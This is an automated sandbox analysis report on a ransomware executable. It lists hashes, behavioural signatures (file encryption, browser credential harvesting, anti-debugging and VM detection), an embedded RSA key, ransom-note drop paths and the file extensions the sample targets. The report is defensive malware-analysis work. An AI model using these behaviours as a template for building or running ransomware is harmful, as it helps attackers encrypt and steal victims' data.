Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report bkscEXd86b.bin

Overview

General Information

Sample Name:bkscEXd86b.bin (renamed file extension from bin to exe)
Analysis ID:367680
MD5:cdda3913408c4c46a6c575421485fa5b
SHA1:56eec7392297e7301159094d7e461a696fe5b90f
SHA256:e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
Tags:ransomware
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Creates files in the recycle bin to hide itself
Machine Learning detection for sample
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Potentially malicious time measurement code found
Tries to harvest and steal browser information (history, passwords, etc)
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Installs a Chrome extension
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • bkscEXd86b.exe (PID: 6588 cmdline: 'C:\Users\user\Desktop\bkscEXd86b.exe' MD5: CDDA3913408C4C46A6C575421485FA5B)
    • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WerFault.exe (PID: 6792 cmdline: C:\Windows\system32\WerFault.exe -pss -s 568 -p 3388 -ip 3388 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • WerFault.exe (PID: 7012 cmdline: C:\Windows\system32\WerFault.exe -u -p 3388 -s 8972 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • explorer.exe (PID: 7120 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • SearchUI.exe (PID: 4888 cmdline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca MD5: C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2)
  • OpenWith.exe (PID: 6724 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: D179D03728E95E040A889F760C1FC402)
  • SearchUI.exe (PID: 1748 cmdline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca MD5: C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: bkscEXd86b.exeReversingLabs: Detection: 42%
Machine Learning detection for sampleShow sources
Source: bkscEXd86b.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: -----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU0_2_00B91D10
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: -----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU0_2_00B91000
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: -----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU0_2_00B91000
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: -----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU0_2_00B91000
Source: bkscEXd86b.exeBinary or memory string: -----BEGIN RSA PUBLIC KEY----- MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPD wrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1Izkq XRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5 H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU
Source: bkscEXd86b.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\DESKTOP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\DEFAULT\DESKTOP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\MICROSOFT\PLAYREADY\INTERNET EXPLORER\DESKTOP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\MICROSOFT\PLAYREADY\INTERNET EXPLORER\INPRIVATE\DESKTOP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\INETCACHE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\TEMP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\APPDATA\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\LOCALCACHE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\LOCALSTATE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\ROAMINGSTATE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\SETTINGS\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\SYSTEMAPPDATA\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\TEMPSTATE\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\INETCOOKIES\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCAL\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\APPLICATION DATA\PACKAGES\MICROSOFT.DESKTOPAPPINSTALLER_8WEKYB3D8BBWE\AC\INETHISTORY\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCALLOW\ADOBE\ACROBAT\DC\READER\DESKTOPNOTIFICATION\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\APPDATA\LOCALLOW\ADOBE\ACROBAT\DC\READER\DESKTOPNOTIFICATION\NOTIFICATIONSDB\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\BNAGMGSPLO\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\EOWRVPQCCS\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\GAOBCVIQIJ\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\KLIZUSIQEN\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\PALRGUCVEH\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\QCFWYSKMHA\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\QCOILOQIKC\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\QNCYCDFIJJ\readme.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile created: C:\DOCUMENTS AND SETTINGS\user\DESKTOP\SQSJKEBWDT\readme.txtJump to behavior
Source: bkscEXd86b.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\john\Documents\Visual Studio 2008\Projects\EncryptFile -svcV2\Release\EncryptFile.exe.pdb source: bkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
Source: Binary string: .TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA source: bkscEXd86b.exe, 00000000.00000000.195247550.0000000000CC1000.00000008.00020000.sdmp
Source: Binary string: visioitunesvmwarelynconenoteneroexceloutlook.ts.psd.ai&#xEF87.dwgx86amd64LDICobjdobjTOPPFEHbinLRA.vssx.vstxPTMPVD.iniMMUS:wux:.resxMFOL.config.bakIFF.etlIBA.bin.objFL.pdbLM.dllotstotetftutdtrtpto source: SearchUI.exe, 00000010.00000002.392411511.000001DBD0B40000.00000004.00000001.sdmp
Source: Binary string: dear!!!.TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORAWINDIRTEMP source: bkscEXd86b.exe, 00000000.00000000.195247550.0000000000CC1000.00000008.00020000.sdmp
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C69E5A __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,0_2_00C69E5A
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B91640 _memset,_memset,_sprintf,FindFirstFileA,_strrchr,_memset,_strncpy,_memset,_sprintf,_memset,_memset,_memset,_memset,_sprintf,FindNextFileA,FindClose,0_2_00B91640
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B91D10 SetServiceStatus,_calloc,_calloc,_sprintf,_memset,_getenv,GetLogicalDrives,_memset,GetLogicalDriveStringsA,_sprintf,GetDriveTypeA,GetDriveTypeA,GetDriveTypeA,_sprintf,_printf,SetServiceStatus,0_2_00B91D10
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 4x nop then movd mm0, dword ptr [edx]0_2_00BC8670
Source: SearchUI.exe, 00000010.00000002.403422488.000001DBD3020000.00000004.00000001.sdmpString found in binary or memory: www.yahoo. equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000004.00000000.244760159.0000000008815000.00000004.00000001.sdmp, explorer.exe, 00000007.00000003.304293863.00000000086A4000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SearchUI.exe, 00000010.00000002.388127839.000001D3D0153000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: SearchUI.exe, 00000010.00000002.402422907.000001DBD1FA0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000003.315552702.000001DBD10D5000.00000004.00000001.sdmp, SearchUI.exe, 0000001C.00000003.471307339.0000015F3591D000.00000004.00000001.sdmpString found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: SearchUI.exe, 00000010.00000002.388127839.000001D3D0153000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: SearchUI.exe, 00000010.00000002.390778572.000001DBD0713000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: SearchUI.exe, 00000010.00000002.360389895.000001D3C8829000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/reminder
Source: SearchUI.exe, 00000010.00000002.382569753.000001D3CED5D000.00000004.00000001.sdmp, SearchUI.exe, 0000001C.00000003.444095457.0000015734983000.00000004.00000001.sdmpString found in binary or memory: http://schemas.live.com/Web/
Source: SearchUI.exe, 00000010.00000002.360813914.000001D3C88B2000.00000004.00000001.sdmpString found in binary or memory: http://schemas.live.com/Web/1bet
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
Source: SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: SearchUI.exe, 00000010.00000003.314054866.000001DBD0CB8000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.ne
Source: SearchUI.exe, 0000001C.00000003.470980310.0000015F358EE000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: SearchUI.exe, 0000001C.00000003.470980310.0000015F358EE000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: SearchUI.exe, 0000001C.00000003.440038340.0000015F35845000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?catHTTP/1.1
Source: SearchUI.exe, 00000010.00000002.362630751.000001D3C89B1000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/news/feed?m
Source: SearchUI.exe, 00000010.00000002.399294977.000001DBD1939000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/news/feed?market=en-us&query=
Source: SearchUI.exe, 00000010.00000003.314210472.000001DBD0760000.00000004.00000001.sdmp, SearchUI.exe, 0000001C.00000003.435616084.0000015F35883000.00000004.00000001.sdmpString found in binary or memory: https://mths.be/fromcodepoint
Source: SearchUI.exe, 00000010.00000002.398688297.000001DBD18B0000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com
Source: SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com/
Source: SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
Source: SearchUI.exe, 00000010.00000002.404559929.000001DBD317C000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
Source: SearchUI.exe, 00000010.00000002.360389895.000001D3C8829000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/profile.asmxModule
Source: SearchUI.exe, 00000010.00000002.399079858.000001DBD1910000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
Source: SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
Source: SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/profile/v0/users/
Source: SearchUI.exe, 00000010.00000002.398360766.000001DBD1870000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.362630751.000001D3C89B1000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/news?ocid=
Source: SearchUI.exe, 00000010.00000002.386080523.000001D3CFEA8000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/spartan/dhp
Source: SearchUI.exe, 00000010.00000002.386080523.000001D3CFEA8000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/spartan/ntp
Source: SearchUI.exe, 0000001C.00000003.444095457.0000015734983000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/spartan/ntpC:
Source: bkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmpString found in binary or memory: https://www.openssl.org/docs/faq.html
